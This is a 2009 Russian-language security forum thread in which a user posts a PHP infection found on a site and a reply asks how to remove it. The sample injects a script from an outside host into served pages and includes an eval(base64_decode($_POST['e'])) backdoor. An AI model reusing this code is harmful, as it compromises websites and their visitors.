ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.10.2009, 14:10
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
PHP код:
if(!isset($f6p2c1)){function f6p2c($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3RoZWZseWluZ3Bvb2RsZXMuY29tL2ltYWdlcy9EU0NfMDAzNS5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function f6p2c2($a,$b,$c,$d){global $f6p2c1;$s=array();if(function_exists($f6p2c1))call_user_func($f6p2c1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='f6p2c')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('f6p2c');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$f6p2cl=(($a=@set_error_handler('f6p2c2'))!='f6p2c2')?$a:0;eval(base64_decode($_POST['e']));
Код:
<script src=http://theflyingpoodles.com/images/DSC_0035.php ></script>
Код:
http://www.freeguard.biz/j100coock.js
Trojan.JS.Iframe.dk
Время детектирования 02 окт 2009 07:48 MSK
Время выпуска обновления 02 окт 2009 13:10 MSK
Последний раз редактировалось -=lebed=-; 19.10.2009 в 14:16..
|
|
|
20.10.2009, 09:19
|
|
Познающий
Регистрация: 25.08.2009
Сообщений: 30
Провел на форуме:
81614
Репутация:
4
|
|
Спасибо парни=) как бы троян удалить...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
